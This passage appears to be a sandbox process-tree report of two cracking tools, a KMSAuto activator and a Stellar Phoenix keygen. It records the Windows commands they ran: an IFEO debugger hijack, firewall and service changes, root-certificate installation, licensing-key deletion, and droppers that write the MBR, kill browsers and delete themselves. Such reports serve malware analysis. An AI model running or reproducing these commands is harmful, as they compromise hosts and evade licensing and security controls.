bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3168

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2244

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:4028

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:788

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:3852

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3856

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:3908

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2904

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3948

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2712

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:1240

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2172

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2912

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:896

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:3068

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:1732

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:3004

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2908

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2952

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:652

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3908

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2416

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3408

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:3580

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2328

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2816

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2324

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:4036

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:480

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2108

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2696

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3844

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3684

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2672

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3640

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:188

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2804

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:4028

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2304

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
PID:2580

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
- Modifies data under HKEY_USERS
PID:2388

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:3900

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2200

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:3012

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:3468

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
PID:896

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
PID:1732

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:480

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2420

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:2052

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2696

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:1208

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop KMSEmulator
2⤵
PID:2076

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete KMSEmulator
2⤵
PID:1244

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
2⤵
PID:900

C:\Windows\system32\reg.exe
reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
3⤵
- Modifies registry key
PID:2368

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:2128

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q
2⤵
PID:2176

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"
2⤵
PID:188

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto
2⤵
PID:4036

C:\ProgramData\KMSAuto\wzt.dat
wzt.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2100

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
2⤵
PID:2464

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
2⤵
PID:2904

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:804

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
2⤵
PID:1632

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
2⤵
PID:3928

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
2⤵
PID:2060

C:\ProgramData\KMSAuto\bin.dat
bin.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3808

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
2⤵
PID:32

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
2⤵
PID:180

C:\ProgramData\KMSAuto\bin\AESDecoder.exe
AESDecoder.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:896

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
2⤵
PID:2324

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:4028

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:936

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:1500

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
2⤵
PID:204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
3⤵
PID:2576

C:\Windows\system32\NETSTAT.EXE
netstat -ano
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\system32\find.exe
find ":1688 "
4⤵
PID:3924

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:2376

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
2⤵
PID:2200

C:\Windows\SysWOW64\sc.exe
"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
2⤵
PID:692

C:\Windows\SysWOW64\sc.exe
"sc.exe" start KMSEmulator
2⤵
PID:2932

C:\Windows\SysWOW64\net.exe
net stop sppsvc /y
2⤵
PID:3128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sppsvc /y
3⤵
PID:1780

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe
2⤵
PID:2240

C:\Windows\System32\taskkill.exe
taskkill /t /f /IM SppExtComObj.Exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c SppPatcher_x64.dat -y -pkmsauto
2⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\SppPatcher_x64.dat
SppPatcher_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1680

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "SppPatcher_x64.dat"
2⤵
PID:3828

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjPatcher.exe C:\Windows\System32\SppExtComObjPatcher.exe /Y
2⤵
- Drops file in System32 directory
PID:2388

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjHook.dll C:\Windows\System32\SppExtComObjHook.dll /Y
2⤵
- Drops file in System32 directory
PID:2200

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "Debugger" /t REG_SZ /d "SppExtComObjPatcher.exe"
2⤵
PID:300

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "KMS_Emulation" /t REG_DWORD /d 0
2⤵
PID:2740

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:3692

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:1432

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2064

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2128

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
- Modifies data under HKEY_USERS
PID:2816

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
PID:3904

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe
2⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /t /f /IM SppExtComObj.Exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3924

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\Users\Admin\AppData\Local\Temp\KMSAuto" /S /Q
2⤵
PID:2440

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjPatcher.exe"
2⤵
PID:3952

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjHook.dll"
2⤵
PID:900

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop KMSEmulator
2⤵
PID:2128

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete KMSEmulator
2⤵
PID:2340

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
2⤵
PID:3700

C:\Windows\system32\reg.exe
reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
3⤵
- Modifies registry key
PID:3900

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:3692

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q
2⤵
PID:1012

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "kmsauto.ini"
2⤵
PID:2064

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x418
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\ProgramData\KMSAuto\bin\KMSSS.exe
"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
1⤵
- Executes dropped EXE
PID:3284

C:\ProgramData\KMSAuto\bin\KMSSS.exe
"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
1⤵
- Executes dropped EXE
PID:588

C:\Windows\system32\SppExtComObjPatcher.exe
SppExtComObjPatcher.exe C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3792

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:2324

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;Trigger=TimerEvent
3⤵
PID:1384

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3004

C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe
"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"
1⤵
- Executes dropped EXE
PID:3068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:1972

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:3924

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2380

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:3904

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:2576

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:4084

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:2244

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:3692

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:2728

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2668

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
5⤵
- Executes dropped EXE
PID:4252

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4160

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
6⤵
PID:4812

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:4924

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4244

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:4196

C:\Users\Admin\AppData\Roaming\1615300462900.exe
"C:\Users\Admin\AppData\Roaming\1615300462900.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300462900.txt"
6⤵
PID:748

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:4628

C:\Users\Admin\AppData\Roaming\1615300467412.exe
"C:\Users\Admin\AppData\Roaming\1615300467412.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300467412.txt"
6⤵
PID:4616

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:2152

C:\Users\Admin\AppData\Roaming\1615300472849.exe
"C:\Users\Admin\AppData\Roaming\1615300472849.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300472849.txt"
6⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
PID:300

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
6⤵
PID:6440

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
5⤵
PID:4300

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4432

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4324

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4572

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4636

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
4⤵
PID:2304

C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
PID:4520

C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 1 3.1615300258.604786a24b096 101
6⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 2 3.1615300258.604786a24b096
7⤵
PID:4884

C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe
"C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe" /VERYSILENT
8⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\is-ENE8H.tmp\syrdykki5r2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ENE8H.tmp\syrdykki5r2.tmp" /SL5="$501F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe" /VERYSILENT
9⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\is-CF5BJ.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-CF5BJ.tmp\winlthst.exe" test1 test1
10⤵
PID:5808

C:\Users\Admin\AppData\Local\Temp\hjy3rs4wttj\uqclxdwfafi.exe
"C:\Users\Admin\AppData\Local\Temp\hjy3rs4wttj\uqclxdwfafi.exe" testparams
8⤵
PID:4364

C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe
"C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe" /VERYSILENT /p=testparams
9⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\is-UC7M0.tmp\gnbvzrskz3i.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UC7M0.tmp\gnbvzrskz3i.tmp" /SL5="$701F2,552809,216064,C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe" /VERYSILENT /p=testparams
10⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\dha0lfa4gl1\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\dha0lfa4gl1\askinstall24.exe"
8⤵
PID:4216

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5928

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:4976

C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\is-3G6TK.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3G6TK.tmp\Setup3310.tmp" /SL5="$50288,802346,56832,C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe
